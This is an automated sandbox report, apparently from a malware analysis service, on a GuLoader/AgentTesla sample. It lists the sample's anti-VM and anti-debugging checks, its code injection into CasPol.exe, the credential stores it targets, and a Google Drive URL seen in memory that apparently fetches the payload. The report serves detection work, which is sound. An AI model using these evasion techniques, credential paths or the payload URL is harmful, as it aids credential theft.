Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB4482 push esp; retf 2_2_02AB44E4
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB3AE0 push eax; retf 2_2_02AB3AFC
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB3AE0 push ebp; retf 2_2_02AB3BF0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB3CF6 push ebx; retf 2_2_02AB3CFC
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB40C7 push ecx; retf 2_2_02AB40C8
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB28DF push edx; retf 2_2_02AB28E0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB0425 push ds; retf 2_2_02AB0470
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB4E1A push ds; iretd 2_2_02AB4E23
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB4451 push esp; retf 2_2_02AB44E4
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB4BBE push 00000050h; retf 2_2_02AB4BC0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB3FBC push edx; retf 2_2_02AB3FC4
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB4786 push eax; retf 2_2_02AB47A0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB4986 push esp; retf 2_2_02AB49B0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB2B92 push ebp; retf 2_2_02AB2BA8
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB3BFB push ebp; retf 2_2_02AB3BF0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB29F8 push edx; retf 2_2_02AB2A00
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB3BFD push ebp; retf 2_2_02AB3BF0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB29CB push edx; retf 2_2_02AB29E0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB4BD8 push esp; retf 2_2_02AB4BE4
Source: initial sample Static PE information: section name: .text entropy: 7.15645216813

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\G47wmLn8uy.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: G47wmLn8uy.exe, 00000002.00000002.1334641181.0000000004C10000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: G47wmLn8uy.exe, 00000002.00000002.1334641181.0000000004C10000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5661219437.0000000000F10000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 00000013.00000002.5661219437.0000000000F10000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1RVZMBX5UH5TLF4YLXHMC756C1SKQ0VOB
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8088 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9947 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Contains functionality to detect virtual machines (SGDT)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_010FF6B8 sgdt fword ptr [eax] 19_2_010FF6B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe System information queried: ModuleInformation Jump to behavior
Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: G47wmLn8uy.exe, 00000002.00000002.1334641181.0000000004C10000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWP
Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000013.00000002.5667755559.0000000001238000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000013.00000002.5667755559.0000000001238000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWk
Source: G47wmLn8uy.exe, 00000002.00000002.1334641181.0000000004C10000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5661219437.0000000000F10000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: CasPol.exe, 00000013.00000002.5661219437.0000000000F10000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB
Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00C49938 LdrInitializeThunk, 19_2_00C49938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D30000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
Source: CasPol.exe, 00000013.00000002.5673314582.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 00000013.00000002.5673314582.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: CasPol.exe, 00000013.00000002.5673314582.00000000018A0000.00000002.00020000.sdmp Binary or memory string: WProgram Managerh

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4712, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4712, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4712, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs